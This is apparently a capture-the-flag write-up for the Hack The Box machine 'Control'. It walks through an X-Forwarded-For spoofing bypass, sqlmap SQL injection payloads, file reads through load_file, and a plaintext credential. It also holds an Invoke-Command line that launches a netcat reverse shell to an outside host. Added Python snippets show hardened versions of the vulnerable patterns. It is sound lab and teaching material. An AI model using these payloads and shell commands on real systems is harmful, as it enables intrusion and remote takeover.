A quick nmap scan to see which ports are open
nmap -sS -p- -oA nmap_full 10.10.10.167:
```
# Nmap 7.80 scan initiated Fri Mar 20 23:53:43 2020 as: nmap -sS -p- -oA nmap_full 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.031s latency).
Not shown: 65531 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
3306/tcp  open  mysql
49666/tcp open  unknown

# Nmap done at Fri Mar 20 23:57:58 2020 -- 1 IP address (1 host up) scanned in 254.87 seconds
```
And a second nmap scan to discover services and versions
nmap -sSVC -p 80,135,3306,49666 10.10.10.167:
```
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
| fingerprint-strings:
|   NULL, oracle-tns:
|_    Host '10.10.15.52' is not allowed to connect to this MariaDB server
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/20%Time=5E7548B5%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.52'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-tns,4
SF:A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.52'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
The MariaDB server refuses connections from our host, so we'll go with the HTTP server.
If we take a look at the source of index.php we can see the following comment:
```
<!-- To Do:
  - Import Products
  - Link to new payment system
  - Enable SSL (Certificates location \\192.168.4.28\myfiles)
<!-- Header -->
```
A very interesting comment that will help us shortly.
Now let's try to reach the admin.php page:
```
$ curl http://10.10.10.167/admin.php
Access Denied: Header Missing. Please ensure you go through the proxy to access this page
```
We are denied, but the message says we are supposed to go through a proxy, so let's add an
X-Forwarded-For HTTP header carrying the internal address we saw in the comment
before, 192.168.4.28.
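The reason this works is that admin.php trusts a header the client controls. As an added example (not code from the box or the write-up), the check below is reconstructed from the observed behaviour and placed next to a proxy-aware version that only honours X-Forwarded-For when the TCP peer is the real proxy; the 192.168.4.0/24 range and the proxy address 192.168.4.28 are assumptions taken from the HTML comment.

```python
# Added example: header-based access control as observed on admin.php, and a
# hardened variant. Network and proxy addresses are assumptions, not the box's config.
import ipaddress

INTERNAL_NET = ipaddress.ip_network("192.168.4.0/24")     # assumed from the comment
TRUSTED_PROXIES = {ipaddress.ip_address("192.168.4.28")}  # assumed real proxy address


def _parse_ip(text: str):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def vulnerable_allows(headers: dict) -> bool:
    """Reconstructed admin.php logic: trusts whatever X-Forwarded-For says.
    Any client can claim an internal address, which is the bypass used above."""
    xff = headers.get("X-Forwarded-For")
    if xff is None:
        return False                      # "Access Denied: Header Missing"
    client = _parse_ip(xff.split(",")[0])
    return client is not None and client in INTERNAL_NET


def hardened_allows(remote_addr: str, headers: dict) -> bool:
    """Only believe X-Forwarded-For when the connection comes from a known proxy,
    and then use the hop that proxy appended (the rightmost one), not the first."""
    peer = _parse_ip(remote_addr)
    if peer is None:
        return False
    if peer not in TRUSTED_PROXIES:
        # Direct connection: the header is attacker-controlled, so ignore it
        # and decide on the TCP peer address alone.
        return peer in INTERNAL_NET
    hops = [h for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    if not hops:
        return False
    client = _parse_ip(hops[-1])
    return client is not None and client in INTERNAL_NET
```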
sqlmap finds that the productName POST parameter of search_products.php is injectable in several ways:
```
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-7611' OR 8249=8249#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=toto' AND (SELECT 1413 FROM(SELECT COUNT(*),CONCAT(0x7178717671,(SELECT (ELT(1413=1413,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dkpS

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=toto' AND (SELECT 7102 FROM (SELECT(SLEEP(5)))ETMY)-- bIbM

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=toto' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x5665716b58786a4955776773767048694661436950414263626c756b56717243616f6d59796b4f66,0x7176786a71),NULL#
```
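As an added example (not the box's code), the pattern behind these findings is reproduced against an in-memory SQLite table next to the parameterised query that neutralises it. The table layout and rows are constructed, the real schema of search_products.php is unknown, and because SQLite has no MySQL `#` comment the boolean payload is written with the `-- ` form that also appears in the sqlmap output.

```python
# Added example: string-built query vs bound parameter for a product search.
# Schema and sample rows are constructed; SQLite stands in for the box's MySQL.
import sqlite3

PRODUCTS = [("ACME Widget", 10.0), ("Toto Gadget", 25.5), ("Secret SKU", 99.0)]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, price REAL)")
    con.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return con


def search_vulnerable(con: sqlite3.Connection, product_name: str) -> list:
    # Concatenation: the user value becomes part of the SQL text, so a quote
    # closes the literal and a tautology (8249=8249) turns the filter off.
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + product_name + "%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, product_name: str) -> list:
    # Bound parameter: the driver sends the value separately from the statement,
    # so the same payload is searched for literally and matches nothing.
    sql = "SELECT name, price FROM products WHERE name LIKE '%' || ? || '%'"
    return con.execute(sql, (product_name,)).fetchall()


# Payload shape from the boolean-based finding above, with a '-- ' comment for SQLite.
BOOLEAN_PAYLOAD = "-7611' OR 8249=8249-- x"
```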
In order to avoid the slow time-based queries we can restrict sqlmap to the other techniques with the --technique BEUS option.
I tried to get a reverse shell with --os-pwn directly but something went wrong,
so let's try a more manual approach.
Let's use --sql-shell to be able to run some SQL queries.
```
$ sqlmap -u http://10.10.10.167/search_products.php --method POST -p productName --data 'productName=toto' -H 'X-Forwarded-For: 192.168.4.28' --dbms mysql --sql-shell
select load_file('C:/WINDOWS/system32/drivers/etc/hosts'): '# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# This file contains the mappings of IP addresses to host names. Each\r\n# entry should be kept on an individual line. The IP address should\r\n# be placed in the first column followed by the corresponding host name.\r\n# The IP address and the host name should be separated by at least one\r\n# space.\r\n#\r\n# Additionally, comments (such as these) may be inserted on individual\r\n# lines or following the machine name denoted by a '#' symbol.\r\n#\r\n# For example:\r\n#\r\n# 102.54.94.97 rhino.acme.com # source server\r\n# 38.25.63.10 x.acme.com # x client host\r\n\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1 localhost\r\n#\t::1 localhost\r\n'
```
With select load_file('C:/WINDOWS/system32/drivers/etc/hosts') we test whether
the database user can read files from the server's filesystem, and it works!
```
$ sqlmap -u http://10.10.10.167/search_products.php --method POST -p productName --data 'productName=toto' -H 'X-Forwarded-For: 192.168.4.28' --dbms mysql --privileges
[17:52:11] [INFO] fetching database users privileges
database management system users privileges:
[*] 'hector'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'manager'@'localhost' [1]:
    privilege: FILE
[*] 'root'@'127.0.0.1' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
```
It seems our current user, manager, is far less privileged than root or hector,
but it still holds the FILE privilege, which is exactly what allowed us to read
C:/WINDOWS/system32/drivers/etc/hosts.
As I said earlier, --os-pwn was not working, so I tried --os-shell to run
some commands manually.
I generated (locally) a meterpreter reverse shell.
The output of whoami /all shows that the shell runs as the IIS user nt authority\iusr:
```
User Name         SID
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
```
With hector's credentials we can use Invoke-Command to run commands as that user:
```
# create a credential object
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('CONTROL\Hector', $pass)
# check that the credentials work by executing whoami
Invoke-Command -Computer Fidelity -ScriptBlock { whoami } -Credential $cred
# Now the real command
Invoke-Command -Computer Fidelity -Credential $cred -ScriptBlock { cmd /c "C:\inetpub\wwwroot\uploads\nc.exe -e powershell 10.10.15.123 10000" }
```
I lost hours at this step. Why?
Because of a troll from the challenge author.
The Invoke-Command cmdlet requires the right hostname to work, even if the target is
localhost, otherwise it fails with an obscure error.
When you get the hostname of the machine in the classic way, with an enumeration
tool, or if you guess it from the name of the HTB box, you will think that the
hostname is CONTROL, right?
```
PS C:\inetpub\wwwroot> gc env:computername
CONTROL
PS C:\inetpub\wwwroot> $env:computername
CONTROL
c:\>echo %computername%
CONTROL
```
Not at all. I don't understand why, but the legacy Hostname.exe returns
Fidelity, and the same happens in PowerShell.